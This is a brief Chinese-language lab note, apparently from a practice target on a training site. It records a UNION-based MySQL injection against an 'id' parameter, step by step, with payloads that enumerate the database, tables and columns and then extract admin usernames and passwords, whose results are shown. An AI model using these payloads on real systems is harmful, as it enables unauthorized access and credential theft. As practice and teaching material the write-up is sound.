mysql注入2

order by 1,2

http://rhiq8003.ia.aqlab.cn/?id=1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,2

数据库：database():maoshe
版本：5.5.53
用户：maoshe@localhost
操作系统：Win32

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(table_name)
from information_schema.tables where table_schema='maoshe'
结果：admin,dirs,news,xss
2.
?id=1 and 1=2 union select 1,column_name
from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

注意column_name中的column没有加S

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name
from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

结果：Id,username,password

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 0,1

Id:1,2
username:ppt领取微信,admin
password:hellohack,zkaqbanban